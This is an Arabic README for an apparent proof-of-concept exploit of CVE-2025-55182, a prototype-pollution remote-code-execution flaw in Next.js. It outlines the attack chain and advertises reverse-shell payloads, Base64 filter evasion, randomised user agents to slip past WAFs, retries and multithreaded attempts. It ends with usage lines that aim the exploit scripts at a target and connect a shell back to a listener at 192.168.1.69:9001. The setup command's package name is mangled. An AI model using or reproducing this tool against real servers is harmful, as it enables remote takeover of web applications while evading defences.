
إثبات المفهوم لـ CVE-2025-55182
CVE-2025-55182 هي ثغرة حرجة من نوع تلوث النموذج الأولي (Prototype Pollution) في nextjs تتيح تنفيذ الأكواد عن بعد (RCE) عبر عدم كفاية تنقية المدخلات في آلية معالجة الطلبات الإطارية، كل هذا يحدث لأن nextjs تثق في كائنات JSON مثل مبتدئ عديم الخبرة
1) تلوث النموذج الأولي في تحليل الطلبات: لا تقوم nextjs بتنقية الكائنات بشكل صحيح مما يسمح بتلوث سلسلة النموذج الأولي
2) إزالة التسلسل غير الآمن: يسمح الإطار لكائنات JSON بتعديل النماذج الأولية للكائن الأساسي
3) تنفيذ الأكواد عن بعد عبر child_process: من خلال تلويث سلسلة النموذج الأولي، بمجرد تلويث النموذج الأولي، يمكننا اختطاف المنطق وجعل الخادم ينفذ أوامر
npm create [email protected] vuln
1) حمولات شل عكسية: شل عكسية لينكس/ويندوز
2) ترميز Base64 للتسلل عبر المرشحات
3) اكتشاف نظام التشغيل تلقائياً
4) وكيل مستخدم عشوائي لتفادي جدران الحماية (WAFs)
5) حلقات إعادة محاولة في حالة الفشل مع تأخير تصاعدي
6) تعدد الخيوط لمحاولات استغلال متزامنة لزيادة الموثوقية
python exp_v2.py target 192.168.1.69 9001 --base64
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3
python exploit.py target.com 192.168.1.69 9001 --no-spoof